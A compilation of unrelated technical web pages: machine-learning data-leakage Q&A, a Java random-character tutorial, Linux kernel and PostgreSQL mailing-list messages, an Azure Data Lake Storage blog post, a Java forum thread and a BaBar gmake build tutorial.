3. Transform both sets of data using the same scaler.
Why is this ok? We are using data from the train set (step 2) to transform the test data?
Yes, we are using known historical data used to fit a model (train) to prepare new and previously unseen data not used to train the model (test).

Hi Jason. Thanks for this post. During model selection, for the given X_train, X_validation and X_test, can’t we fit and transform each of them separately? I’m asking this question because, when I am testing the saved model on new test data, I need to fit_transform the new data set.

Not sure I follow your question, perhaps you can rephrase it? The data prep is fit on the training set, then applied to the training, test, and validation sets before the data is provided to the model.

During training, we standardise the train data (scaler.fit_transform()). Then, based on the train data, we standardise the validation and test data (scaler.transform()). My question is: after model selection, when we have a new batch of test data, we need to standardise it. At that time, I just standardise the new test data, i.e. scaler.fit_transform(), and predict using the saved model. Is this method right to treat new test data? Especially when we are running the model in a web application and have no access to historical data. Thanks!

Yes, scale new data using a data prep object fit on training data.

Sorry Jason. Didn’t quite understand. In the context of a web application, we just have the saved model, right? How do I get the data prep object that is fit on training data? Am I missing something? So, then, would it be right to just scale the test data and use it for prediction?

You can save the entire pipeline (data prep and model) or save the data prep objects and model separately. Your choice.

Oh ok. Got it. Thanks Jason.

Hi Jason, Great explanations always. Can you please indicate whether your advice also applies to categorical data? That is, can we encode categorical data before the train test split? Thanks.

Yes. Encoding should be on training data only. You might want to use “domain knowledge” in the encoding though (e.g.
all possible values you may see in practice), and that could be fine.

Hi Jason, Great article. I have a question about the FE process. I do understand that in order to perform transformations such as min/max scaling or normalization we should first fit_transform on the training data and then transform on the test data. Before we apply the modelling we always look at the features: try to find the correlations, fill the missing values in the data and design new features:

1) Whenever I want to deal with missing values, how can I deal with the issue of imputing the values? To my understanding, I can’t simply look at the combined training and testing set and then impute the missing values, as that would leak knowledge about the testing set. What’s the solution to that problem?

2) Assuming I deal with continuous numerical features, e.g. age. If I want to perform binning on that feature then I would do it separately on training and testing data. But that would create a big problem, which is that the binning would be different in training and testing data due to different data, and thus the features will be different. This will not allow me to later fit the data to the model. How do I deal with this issue? Binning numerical features based on the whole dataset would solve that issue but might introduce data leakage.

3) Do log() transforms also need to be applied separately on training and testing data? It is just a mathematical operation that doesn’t seem to be using any specific parameters of the data (correct me if I am wrong).

Your feedback would be of great value, Thanks

You fit imputation methods on the training data and apply them to the test data just like any other data preparation method. Binning would be fit on the training data and applied to train and test data in the same way. Log can be applied any time to any data; it has no learned coefficient.
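A sketch combining the imputation, binning, and saved-pipeline questions from the comments above: both transforms live inside a Pipeline, so their learned statistics (column medians, bin edges) come from the training data only, and the whole fitted pipeline can be persisted as one object for use in, say, a web application. The toy data and parameter choices here are illustrative assumptions:

```python
# Imputation + binning fit on the training set only, then the whole
# fitted pipeline is serialized so data prep and model travel together.
import pickle
import numpy as np
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import KBinsDiscretizer

rng = np.random.default_rng(1)
X = rng.normal(size=(200, 4))
X[rng.random(X.shape) < 0.1] = np.nan          # sprinkle missing values
y = (np.nan_to_num(X).sum(axis=1) > 0).astype(int)

X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)

pipeline = Pipeline(steps=[
    ('impute', SimpleImputer(strategy='median')),          # medians from train only
    ('bin', KBinsDiscretizer(n_bins=5, encode='ordinal')), # edges from train only
    ('model', LogisticRegression()),
])
pipeline.fit(X_train, y_train)
acc = pipeline.score(X_test, y_test)
print('Test accuracy: %.3f' % acc)

# Persist data preparation and model together; reload and reuse later.
blob = pickle.dumps(pipeline)
loaded = pickle.loads(blob)
```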
https://machinelearningmastery.com/data-preparation-without-data-leakage/
Java program to print a random uppercase letter in a String: In this tutorial, we will learn how to print a random uppercase letter from a String in Java. To achieve that, we will first create one random number, bounded by the length of the string. After that, we will pick the character at that position in the String and finally, we will print the uppercase version of the character. The Java program is as below:

Java program to print a random uppercase character:

import java.util.*;

public class Main {
    public static void main(String[] args) {
        //1
        String myString = "HelloWorld";

        //2
        Random randomNumber = new Random();

        //3
        for (int i = 0; i < 10; i++) {
            //4
            int randomNo = randomNumber.nextInt(myString.length());

            //5
            Character character = myString.charAt(randomNo);

            //6
            System.out.println("Random Character : " + Character.toUpperCase(character));
        }
    }
}

Explanation: The commented numbers in the above program denote the step numbers below:

- The String is given and stored in the variable myString.
- Create one Random object to create random numbers.
- Run one for loop for 10 iterations. We will print one random character each time.
- Create one random number using the Random object created in step 2. For this example, nextInt will produce a maximum value of 9, since the size of the string myString is 10 and the bound passed to nextInt is exclusive.
- Get the character of the string at the random position calculated in the above step.
- Print out the uppercase character by converting the character to upper case.

Output:

Random Character : E
Random Character : R
Random Character : R
Random Character : O
Random Character : E
Random Character : D
Random Character : L
Random Character : O
Random Character : D
Random Character : D

The output will be different in your case, because a random character is picked in each of these 10 steps.
https://www.codevscolor.com/java-print-random-uppercase-letter-string
On Sat, Feb 04, 2012 at 10:17:48PM +0000, Russell King - ARM Linux wrote:
> On Fri, Jan 27, 2012 at 02:35:54PM -0700, Grant Likely wrote:
> > Hey everyone,
> >
> > This patch series is ready for much wider consumption now. I'd like
> > to get it into linux-next ASAP because there will be ARM board support
> > depending on it. I'll wait a few days before I ask Stephen to pull
> > this in.
>
> Grant,
>
> Can you answer me this: does this irqdomain support require DT?
>
> The question comes up because OMAP has converted some of their support
> to require irq domain support for their PMICs, and it seems irq domain
> support requires DT. This seems to have made the whole of OMAP
> essentially become a DT-only platform.
>
> Removing the dependency on IRQ_DOMAIN brings up these build errors
> in the twl-core code (that being the PMIC for OMAP CPUs):
>
> drivers/mfd/twl-core.c: In function 'twl_probe':
> drivers/mfd/twl-core.c:1229: error: invalid use of undefined type 'struct irq_domain'
> drivers/mfd/twl-core.c:1230: error: invalid use of undefined type 'struct irq_domain'
> drivers/mfd/twl-core.c:1235: error: implicit declaration of function 'irq_domain_add'
>
> That's a bit of a problem, because afaik there aren't the DT descriptions
> for the boards I have yet, so it's causing me to see regressions when
> building and booting kernels with CONFIG_OF=n.
>
> The more core-code we end up with which requires DT, the worse this
> problem is going to become - and obviously saying "everyone must now
> convert to DT" is, even today, a mammoth task.
>
> Now, here's the thing: I believe that IRQ domains - at least as far as
> the hwirq stuff - should be available irrespective of whether we have
> the rest of the IRQ domain support code in place, so that IRQ support
> code doesn't have to keep playing games to decode from the global
> space to the per-controller number space.
>
> I believe that would certainly help the current OMAP problems, where
> the current lack of CONFIG_IRQ_DOMAIN basically makes the kernel oops
> on boot.
>
> How we fix this regression for 3.4 I've no idea at present, I'm trying
> to work out what the real dependencies are for OMAP on this stuff.

Actually, it turns out to be not that hard, because twl doesn't actually
make use of the IRQ domain stuff:

commit aeb5032b3f8b9ab69daa545777433fa94b3494c4
Author:     Benoit Cousson <b-cousson@ti.com>
AuthorDate: Mon Aug 29 16:20:23 2011 +0200
Commit:     Samuel Ortiz <sameo@linux.intel.com>
CommitDate: Mon Jan 9 00:37:40 2012 +0100

    mfd: twl-core: Add initial DT support for twl4030/twl6030

    [grant.likely@secretlab.ca: Fix IRQ_DOMAIN dependency in kconfig]

Adding any dependency - especially one which wouldn't be enabled - for
a new feature which wasn't required before is going to break existing
users, so this shouldn't have been done in the first place.

A better fix to preserve existing users would've been as below - yes
it means more ifdefs, but if irq domain is to remain a DT only thing
then we're going to end up with _lots_ of this stuff.

I'd much prefer to see irq domain become more widely available so it
doesn't require these ifdefs everywhere.

 drivers/mfd/Kconfig    |    2 +-
 drivers/mfd/twl-core.c |    4 ++++
 2 files changed, 5 insertions(+), 1 deletions(-)

diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
index 28a301b..bd60ce0 100644
--- a/drivers/mfd/Kconfig
+++ b/drivers/mfd/Kconfig
@@ -200,7 +200,7 @@ config MENELAUS

 config TWL4030_CORE
 	bool "Texas Instruments TWL4030/TWL5030/TWL6030/TPS659x0 Support"
-	depends on I2C=y && GENERIC_HARDIRQS && IRQ_DOMAIN
+	depends on I2C=y && GENERIC_HARDIRQS
 	help
 	  Say yes here if you have TWL4030 / TWL6030 family chip on your board.
 	  This core driver provides register access and IRQ handling
diff --git a/drivers/mfd/twl-core.c b/drivers/mfd/twl-core.c
index e04e04d..5913aaa 100644
--- a/drivers/mfd/twl-core.c
+++ b/drivers/mfd/twl-core.c
@@ -263,7 +263,9 @@ struct twl_client {

 static struct twl_client twl_modules[TWL_NUM_SLAVES];

+#ifdef CONFIG_IRQ_DOMAIN
 static struct irq_domain domain;
+#endif

 /* mapping the module id to slave id and base address */
 struct twl_mapping {
@@ -1226,6 +1228,7 @@ twl_probe(struct i2c_client *client, const struct i2c_device_id *id)
 	pdata->irq_base = status;
 	pdata->irq_end = pdata->irq_base + nr_irqs;

+#ifdef CONFIG_IRQ_DOMAIN
 	domain.irq_base = pdata->irq_base;
 	domain.nr_irq = nr_irqs;
 #ifdef CONFIG_OF_IRQ
@@ -1233,6 +1236,7 @@ twl_probe(struct i2c_client *client, const struct i2c_device_id *id)
 	domain.ops = &irq_domain_simple_ops;
 #endif
 	irq_domain_add(&domain);
+#endif

 	if (i2c_check_functionality(client->adapter, I2C_FUNC_I2C) == 0) {
 		dev_dbg(&client->dev, "can't talk I2C?\n");
http://lkml.org/lkml/2012/2/4/105
On Mon, Feb 6, 2017 at 5:49 PM, Corey Huinker <corey.huin...@gmail.com> wrote:
> I suppressed the endif-balance checking in cases where we're in an
> already-failed situation.
> In cases where there was a boolean parsing failure, and ON_ERROR_STOP is on,
> the error message no longer speaks of a future which the session does not
> have. I could have left the ParseVariableBool() message as the only one, but
> wasn't sure that that was enough of an error message on its own.
> Added the test case to the existing tap tests. Incidentally, the tap tests
> aren't presently fooled into thinking they're interactive.
>
> $ cat test2.sql
> \if error
> \echo NO
> \endif
> \echo NOPE
> $ psql test < test2.sql -v ON_ERROR_STOP=0
> unrecognized value "error" for "\if <expr>": boolean expected
> new \if is invalid, ignoring commands until next \endif
> NOPE
> $ psql test < test2.sql -v ON_ERROR_STOP=1
> unrecognized value "error" for "\if <expr>": boolean expected
> new \if is invalid.

I (still) think this is a bad design. Even if you've got all the messages just right as things stand today, some new feature that comes along in the future can change things so that they're not right any more, and nobody's going to relish maintaining this. This sort of thing seems fine to me:

new \if is invalid

But then further breaking it down by things like whether ON_ERROR_STOP=1 is set, or breaking down the \endif output depending on the surrounding context, seems terrifyingly complex to me. Mind you, I'm not planning to commit this patch anyway, so feel free to ignore me, but if I were planning to commit it, I would not commit it with that level of chattiness.

--
Robert Haas
EnterpriseDB: The Enterprise PostgreSQL Company
https://www.mail-archive.com/pgsql-hackers@postgresql.org/msg304711.html
We have a wide variety of options to store data in Microsoft Azure. Nevertheless, every storage option has a unique purpose for its existence. In this blog, we will discuss ADLS (Azure Data Lake Storage) and the multi-protocol access that Microsoft introduced in 2019.

Introduction to ADLS (Azure Data Lake Storage)

According to the Microsoft definition, it is an enterprise-wide hyper-scale repository for big data analytics workloads that enables you to capture data of any size and ingestion speed in one single place for operational and exploratory analytics. The main purpose of its existence is to enable analytics on the stored data (which may be structured, semi-structured or unstructured) and to provide enterprise-grade capabilities like scalability, manageability, reliability, etc.

What is it built on?

ADLS is built on top of Azure Blob Storage. Blob Storage is one of the storage services under the suite of Storage accounts. Blob Storage lets you store any type of data; it doesn't need to be of a specific data type.

Does the functionality of ADLS sound like Blob storage?

From the above paragraphs, it looks like both ADLS and Blob storage have the same functionality, because both services can be used to store any type of data. But, as I said before, every service has its purpose for its existence. Let us explore the differences between ADLS and Blob storage.

Difference between ADLS and Blob storage

Purpose: ADLS is optimized for analytical workloads on the data stored in it, while Blob storage is the usual way of storing file-based information in Azure where the data will not be accessed very often (also called cold storage).

Cost: With both storage options, we pay for the data stored and for I/O operations. In the case of ADLS, the cost is slightly higher than Blob.

Support for the WebHDFS interface: ADLS supports a standard WebHDFS interface and can access the files and directories in Hadoop. Blob does not support this feature.

I/O performance: ADLS is built for running large-scale systems that require massive read throughput when queried at any pace. Blob is used to store data that will be accessed infrequently.

Encryption at rest: Since ADLS reached general availability, it has supported encryption at rest: it encrypts data flowing in public networks and at rest. (At the time of the original comparison, Blob Storage did not offer encryption at rest.) See more details on the comparison here.

Now, without any further delay, let us dig into multi-protocol access for ADLS.

Multi-protocol access for ADLS

This is one of the significant announcements that Microsoft made in 2019 as far as ADLS is concerned. Multi-protocol access to the same data allows you to leverage existing object storage capabilities on Data Lake Storage accounts, which are hierarchical namespace-enabled storage accounts built on top of Blob storage. This allows you to put all your different types of data in the data lake so that users can make the best use of your data as the use case evolves. Multi-protocol access is achieved via the Azure Blob Storage API and the Azure Data Lake Storage API. The convergence of the two existing services, ADLS Gen1 and Blob storage, paved the path to a new term: Azure Data Lake Storage Gen2.

Expanded feature set

With the announcement of multi-protocol access, existing blob features such as access tiers and lifecycle management policies are now unlocked for ADLS. Furthermore, much of the feature set and ecosystem support of Blob storage is now available for your data lake storage. This could be a great shift, because your blob data can now be used for analytics. The best thing is that you don't need to update your existing applications to get access to your data stored in Data Lake Storage. Moreover, you can leverage the power of both your analytics and object storage applications to use your data most effectively.

While exploring the expanded feature set, one of the best things I found is that ADLS can now be integrated with Azure Event Grid. Yes, we have one more publisher on the list for Azure Event Grid. Azure Event Grid can now consume events generated from Azure Data Lake Storage Gen2 and route them to its subscribers, with webhooks, Azure Event Hubs, Azure Functions, and Logic Apps as endpoints.

Modern Data Warehouse scenario

The above image depicts a use case scenario of ADLS integration with Event Grid. First off, a lot of data comes from different sources like logs, media, files and business apps. That data ends up in ADLS via Azure Data Factory, and the Event Grid subscription listening to ADLS gets triggered once data reaches it. The event is then routed via Event Grid and Functions to Azure Databricks. The file is processed by the Databricks job, which writes the output back to Azure Data Lake Storage Gen2. Meanwhile, Azure Data Lake Storage Gen2 pushes a notification to Event Grid, which triggers an Azure Function to copy the data to Azure SQL Data Warehouse. Finally, the data is served via Azure Analysis Services and Power BI.

Wrap-up

In this blog, we saw an introduction to Azure Data Lake Storage and the difference between ADLS and Blob storage. Further, we investigated multi-protocol access, one of the new entrants in ADLS. Finally, we looked into one of the extended feature sets - the integration of ADLS with Azure Event Grid - and its use case scenario. I hope you enjoyed reading this article. Happy learning!

Image Credits: Microsoft

This article was contributed to my site by Nadeem Ahamed and you can read more of his articles from here.
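To make the Event Grid step above concrete: a subscriber (such as an Azure Function) usually starts by pulling the blob URL out of the delivered JSON before kicking off any downstream processing. The payload below is a trimmed, hand-written illustration of the Microsoft.Storage.BlobCreated event shape; the subscription, account, container, and blob names are made up, and depending on the endpoint binding, events may arrive one at a time rather than in a list:

```python
import json

# Hand-written, trimmed illustration of a BlobCreated event delivery.
payload = """
[{
  "topic": "/subscriptions/xxx/resourceGroups/rg/providers/Microsoft.Storage/storageAccounts/mydatalake",
  "subject": "/blobServices/default/containers/raw/blobs/logs/2020/01/15/events.json",
  "eventType": "Microsoft.Storage.BlobCreated",
  "data": {
    "api": "PutBlob",
    "contentLength": 524288,
    "url": "https://mydatalake.blob.core.windows.net/raw/logs/2020/01/15/events.json"
  }
}]
"""

events = json.loads(payload)
blob_urls = [
    e["data"]["url"]
    for e in events
    if e["eventType"] == "Microsoft.Storage.BlobCreated"  # ignore other event types
]
print(blob_urls[0])
```

In the Modern Data Warehouse scenario, a URL extracted like this is what the Function would hand to the Databricks job or the copy step.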
https://sajeetharan.com/2020/01/15/investigating-into-azure-data-lake-storage-and-its-multi-protocol-access/
Programming assistance
Matt Andrew - 09:26am Dec 6, 2001 EDT

I am trying to write to a file. When I build it I get an error that says "DataOutputStream is not an interface name". Here is some of my source code:

import com.ms.wfc.app.*;
import com.ms.wfc.core.*;
import com.ms.wfc.ui.*;
import com.ms.wfc.html.*;
import java.awt.event.*;
import java.io.*;

public class newRecords extends Form implements DataOutputStream {
    main record = new main();
    DataOutputStream ostream;

    public newRecords() throws IOException {
        super();
        try {
            ostream = new DataOutputStream(new FileOutputStream());
        } catch (IOException e) {
            System.err.println("File not opened");
            System.exit(1);
        }
        button1.addOnClick(ostream.writeUTF(record.date));
        button1.addOnClick(ostream.writeUTF(record.checkNum));
        button1.addOnClick(ostream.writeUTF(record.description));
        button1.addOnClick(ostream.writeUTF(record.debit));
        button1.addOnClick(ostream.writeUTF(record.payment));
        button1.addOnClick(ostream.writeUTF(record.fees));

        // Required for Visual J++ Form Designer support
        initForm();
        // TODO: Add any constructor code after initForm call
    }

I would love any suggestions anyone might have. I have been working on this for over a week. Thanks.

Reply: It would help when you post error messages, if you would copy and paste the FULL text of the message. That usually includes the line number of the error and shows the line itself where the error was. That can save a lot of guessing!!! The error is that your class tries to "implement" a class and not an interface. You can only implement interfaces, NOT classes. To get your code to compile, remove the "implements" clause from the class statement.

New question: I have to write a program where I have to read a file. This can be easily done using a FileReader, but the problem is that this file gets new lines every now and then, and I want my program to read the file every time a new line is added. Also, since this file is very long, I don't want my program to read from the beginning every time a new line is added. It should read only the new line. Please help, I need a quick reply.

Reply: If you want to read the file at any location, not just sequentially from the beginning, use the RandomAccessFile class. It allows you to position to any byte in the file with the seek() method. The problem is knowing where individual records begin and end. One way to solve that problem is to have all the records be of a fixed size.

Reply: The JDK version I have is 1.3.1, and there are two DataOutputStream classes: one belongs to java.io, which is a class, and one belongs to org.omg.CORBA, which is an interface. So, if your intention is org.omg.CORBA, do "implements org.omg.CORBA".

Reply: Hi, "implements DataOutputStream" can't work, as DataOutputStream is not an interface, so it can't be implemented ;-)) HTH, Christian

New question: I have to give the full path while accessing the file using the following code. Is there any alternative where I can provide the relative path and still get the desired result?

BufferedReader in = new BufferedReader(new FileReader("/apps/secDBadmin/classes/database.cfg"));

I'm accessing the file database.cfg from a class which is inside the same folder (/apps/secDBadmin/classes).
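The RandomAccessFile/seek() advice in the thread translates directly to other languages: remember the offset where the last read ended and resume there, so the growing file is never re-read from the beginning. A small Python sketch of the same idea (the function and file names are illustrative):

```python
import os
import tempfile

def read_new_lines(path, offset):
    """Return lines appended since `offset`, plus the offset to resume from."""
    with open(path, "r") as f:
        f.seek(offset)              # jump past everything already processed
        return f.readlines(), f.tell()

# Demo on a temporary file standing in for the growing log.
path = os.path.join(tempfile.mkdtemp(), "growing.log")
with open(path, "w") as f:
    f.write("line 1\n")

first, pos = read_new_lines(path, 0)    # first pass: read from the start
with open(path, "a") as f:
    f.write("line 2\n")                 # the file grows
fresh, pos = read_new_lines(path, pos)  # second pass: only the new line
print(fresh)                            # prints ['line 2\n']
```

A real watcher would call this in a loop (or on a file-change notification), carrying `pos` forward between calls.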
http://www.developer.com/java/other/article.php/949021/Java-Discussion-Programming-assistance.htm
To turn C++ code into a runnable program, you need to compile and link the code. Compiling the code puts it together into things called libraries (lib files). Linking the code uses the information in these libraries to build a program. The program is the ultimate goal of the compile-and-link stage. The programs are usually called executables, binaries, or applications. BaBar application names usually end in "App". For example, when you compile and link the code in the BetaMiniUser package, it produces an application called BetaMiniApp.

In the last section, you made some changes to C++ code in the BetaMiniUser package. But in order for these changes to take effect, you have to recompile and relink your code to make a new BetaMiniApp that includes your changes. This section begins with an introduction to gmake, BaBar's compile-and-link utility. Then you will compile and link your code from Example 2. The section also includes suggestions for how to deal with compile-and-link problems, and an optional, more detailed discussion of gmake's GNUmakefiles.

BaBar's compile-and-link utility is called gmake. The basic gmake command is:

> gmake <target>

This tells gmake to "make" or "build" the target. Different targets correspond to different gmake actions. Some important targets include lib to compile code, and bin to link code. The available targets and the instructions for building them are defined in a file called GNUmakefile. Whenever you issue a gmake command, gmake looks in the current directory for a GNUmakefile, then follows the instructions for that target. There is a GNUmakefile in every release, including the test release you created. GNUmakefiles are also included in any package that you check out. The GNUmakefile of the release is the master GNUmakefile. This is why you usually issue gmake commands from the test release directory. Commands issued from a package in a release will only have access to targets defined in the package's GNUmakefile.

For general use of BaBar software, you will use gmake commands often, but you will probably not need to write or modify a GNUmakefile. Even users writing new analysis modules rarely need to make significant modifications to a GNUmakefile.

As part of a build, gmake also generates dependency files. These files record the dependencies among your source code files. Their names have the same root as the source file and a '.d' suffix. In BaBar software these files are stored in the tmp directory of your release. Like the lib and bin directories, the tmp directory has a subdirectory for each architecture that you compile code on.

The command to compile your code is gmake lib. Compiling a C++ file converts it into an object module. Once object modules have been created, they need to be linked together to build the executable. The command to link your code is gmake bin. The new executables are placed in your bin/$BFARCH directory. If you list this directory, you will see a '*' after the names of most of the files, indicating that they are executables.

A related useful target is cleanarch. The command gmake cleanarch is like gmake clean, but it removes only library, binary and temporary files saved under the current architecture (i.e. the architecture set when you most recently issued an srtpath command in the current session). It leaves the libraries and/or binaries built with other architectures intact.

To build just the BetaMiniUser code, you could issue:

gmake lib
gmake BetaMiniUser.bin

You will notice that the link command, gmake BetaMiniUser.bin, is a bit different from the gmake bin command that you used before. In general, commands of the form "gmake package.target" perform the task "gmake target" on the files in "package" only. The command "gmake BetaMiniUser.bin" links only the code in BetaMiniUser.
This is useful if you have a lot of packages checked out, because instead of making a bunch of executables that you don't need, you make only the BetaMiniUser executables.

Now it is time to compile and link your new code from Example 2 of the Editing Code section. First, make sure you have done:

ana42> srtpath <enter> <enter>
ana42> cond22boot

If you look in your lib and bin directories, you will see your old lib and bin files from the Quicktour:

ana42> ls -l lib/$BFARCH
total 2520
-rw-r--r-- 1 penguin br 2577960 Apr 20 21:17 libBetaMiniUser.a
drwxr-xr-x 5 penguin br    2048 Apr 20 21:05 templates
ana42> ls -l bin/$BFARCH/
total 69009
-rwxr-xr-x 1 penguin br 70663891 Apr 20 21:21 BetaMiniApp
-rw-r--r-- 1 penguin br       72 Apr 20 21:23 Index

Let's clean out these old files before we begin, just to be on the safe side:

ana42> gmake clean
GNU Make version 3.79.1, Build OPTIONS = Linux24SL3_i386_gcc323-Debug-native-Objy-Optimize-Fastbuild-Ldlink2-SkipSlaclog-Static-Lstatic
Linux yakut03 2.4.21-47.ELsmp #1 SMP Thu Jul 20 10:30:12 CDT 2006 i686 athlon i386 GNU/Linux [uname -a]
-> clean:
-> cleanarch: Linux24SL3_i386_gcc323
'tmp/Linux24SL3_i386_gcc323' is soft link to /afs/slac.stanford.edu/g/babar/build/p/penguin/ana42/tmp/Linux24SL3_i386_gcc323
'shtmp/Linux24SL3_i386_gcc323' is soft link to /afs/slac.stanford.edu/g/babar/build/p/penguin/ana42/shtmp/Linux24SL3_i386_gcc323
rm -f -r
mkdir
-> installdirs:
If you check your lib and bin directories again, you will find that they are now (almost) empty: ana42> ls -l lib/$BFARCH total 2 drwxr-xr-x 5 penguin br 2048 Apr 21 20:44 templates ana42> ls -l bin/$BFARCH total 0 ana42> Now you can compile and link your code. Compile and/or link jobs should always be send to the bldrecoq queue. From your test release issue ana42> rm all.log ana42> bsub -q bldrecoq -o all.log gmake all A feature of the batch system (bsub part of the command) is that log files are NOT overwritten. Instead, if you do not remove your old all.log file, then the output for the current job will be appended to the bottom of the old log file. To avoid that, you either have to delete the old log file, or choose a new name for your new log file. That is why you removed the old log file above. The gmake all command compiles and links the code. The first thing to do after compiling and linking is to check your bin directory to make sure that your binary was produced and that it is brand new: ls -l bin/$BFARCH total 69014 -rwxr-xr-x 1 penguin br 70669051 Apr 21 20:56 BetaMiniApp -rw-r--r-- 1 penguin br 72 Apr 21 20:57 Index If you make a mistake when you edit BaBar code, then you will get an error messages on your terminal or in your log file. There are two types of problems that you could encounter: This section will focus on the first type of error: compile and link errors. Later, the debugging section will teach you how to deal with run-time errors. You may not have a successful compilation the first time. The more code you edit, the more likely you are to make a small mistake that could cause the compile or link process to fail. The first thing you should do after every compile or link is check your bin directory to make sure your binary was produced and that it is brand new. If it was not produced, then you need to look in your log file to find out why gmake failed. 
As an example, suppose you accidentally removed the line:

#include "BetaMiniUser/QExample.hh"

When this is done, you check the bin directory:

ana42> ls -l bin/$BFARCH
total 1
-rw-r--r-- 1 penguin br 72 May 15 04:40 Index

You investigate the log file for further clues. Here is the log file: all.log with errors. (Note that the target that gmake is working on is indicated by the little arrows in the log file, "->BetaMiniUser.lib" and "->BetaMiniUser.bin".) Scrolling down the log file, you find several gmake error messages. There's one in the BetaMiniUser.lib stage:

gmake[3]: *** [/afs/slac.stanford.edu/u/br/penguin/ana42/lib/Linux24SL3_i386_gcc323/libBetaMiniUser.a(QExample.o)] Error 1
gmake[2]: *** [BetaMiniUser.lib] Error 2
gmake[4]: *** [/afs/slac.stanford.edu/u/br/penguin/ana42/lib/Linux24SL3_i386_gcc323/libBetaMiniUser.a(QExample.o)] Error 1

Whenever you see those stars (***) and the word Error, that means you are in trouble. Now look at the lines just above the ***/Error line to find out what was the last thing gmake did before it failed.
Right before the lib-stage error, the message is:

Compiling QExample.cc [libBetaMiniUser.a] [cc-1]
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:25: syntax error before `::' token
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:37: syntax error before `::' token
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:51: syntax error before `::' token
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:57: warning: ISO C++ forbids declaration of `_numTrkHisto' with no type
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:57: `manager' was not declared in this scope
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:58: warning: ISO C++ forbids declaration of `_pHisto' with no type
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:58: `manager' was not declared in this scope
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:60: syntax error before `return'
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:66: syntax error before `::' token
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:75: syntax error before `::' token
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:83: syntax error before `->' token
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:86: `trkList' was not declared in this scope
/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:88: syntax error before `while'

(In this case, the error messages for the lib and bin stages are identical. This does not always happen. In any case you should look at the errors from the earliest target first, because later targets depend on earlier targets. Fixing the lib-stage error might fix the bin-stage error automatically.)
So you decide to look at the first error message that occurs, since that is the first place that gmake ran into trouble:

/afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:25: syntax error before `::' token
QExample::QExample( const char* const theName,

The job fails at the beginning of the QExample constructor. Not only that, but according to the error message, it fails before the '::' token. Now, there is only one thing in front of the '::' token: the word QExample. But QExample is a perfectly valid class - why should gmake think that it is a syntax error? It seems that for some reason, gmake does not recognize the QExample class. And if gmake does not recognize a class, then that is probably because it has not read the header file for that class. Sure enough, when you check QExample.cc, you find that you have forgotten to include QExample.hh. This would explain the other error messages as well: every time gmake sees "QExample", it is confused because it does not know what QExample is. Furthermore, it also does not recognize _numTrkHisto, because this object was defined in QExample.hh as a private member object.

You put back the #include statement, and send your "gmake all" job again:

ana42> rm all.log
ana42> bsub -q bldrecoq -o all.log gmake all

This time, everything worked fine:

ana42> ls -l lib/$BFARCH
total 2408
-rw-r--r-- 1 penguin br 2462826 May 15 04:43 libBetaMiniUser.a
drwxr-xr-x 5 penguin br    2048 May 15 04:36 templates
ana42> ls -l bin/$BFARCH
total 48073
-rwxr-xr-x 1 penguin br 49225543 May 15 04:44 BetaMiniApp
-rw-r--r-- 1 penguin br       72 May 15 04:44 Index

There is a brand new BetaMiniApp! And you can tell from the time that BetaMiniUser's lib file has also been recompiled. Normally, gmake is pretty good at figuring out what needs to be recompiled and what doesn't. But to be safe, you can issue a "gmake clean" to clean out all the old lib and bin files before you recompile.
The example above of course shows you only one of the many, many possible error messages that can appear in your log file. Other typical compile errors include environment problems, such as forgetting to run srtpath before building.

Compile/link error messages can be confusing. It is not always obvious what the problem is. In the end, all you can do is try your best to decipher the log file. If you can't figure it out, then your best bet is to ask someone who has had more practice with gmake errors, or, if you are all alone, submit your problem to the prelimbugs Hypernews forum. When you submit your question, be sure to indicate what you were trying to do, the commands you issued, and the error messages you received. For example, if you could not figure out what was wrong in the above example, you would first explain your problem, and then provide those details. You will get an answer much faster if you provide complete information. If your compile-and-link problem occurs in one of the Workbook examples, then you can email me, the Workbook editor, and I'll see what I can do. Perhaps you have discovered a bug in the Workbook! (But please try to solve it yourself, first.)

Now you have learned most of what you need to know to use gmake to compile and link. But you may find it helpful to learn a bit more about how GNUmakefiles work. One of the virtues of GNUmakefiles is their ability to handle the many dependencies among the many, many lines of C++ code that must be put together to make an executable. This (optional) section revisits the GNUmakefile, with a focus on how these dependencies are managed.

An executable is built from the code defined in multiple files. When changes are made in one or more of these files, the code in the modified files and all dependent files will need to be re-compiled and re-linked. Compile and link commands often involve many options, such as directory search paths for included files, names for compiled files, warning messages, debugging information and so forth.
Compile and link commands quickly become quite lengthy, and in large software projects the dependencies amongst files are usually rather involved. gmake's job is to manage this complicated process.

GNUmakefiles define a set of instructions for how to compile and assemble code segments into the executable. The file also defines many variables such as search paths, which compiler to use, etc. The instructions specify the dependencies of the code segments so that the gmake utility can reprocess only those components that need it. A well-written makefile can avoid unnecessary compilation and save much time.

The gmake facility looks in the current directory for a file named GNUmakefile, makefile, or Makefile (in that order). The first one of these files found is used to define the dependency/build rules for the given target.

The general structure of an instruction in the GNUmakefile consists of a target, a dependency, and a rule. Associated with each target is a set of dependent files. When any of the dependent files have been modified, or if the target file does not exist, the target will be rebuilt (or built) in accordance with the rule. For example, a line in a GNUmakefile might be:

target : dependency1 dependency2
	rule-for-building-target

Not every target names a file that gets built; such targets are called "phony" targets. An example of a phony target is workdir's setup target. The command

gmake workdir.setup

does not compile or link code. Instead, it creates some links in workdir: PARENT, RELEASE, bin, and shlib.

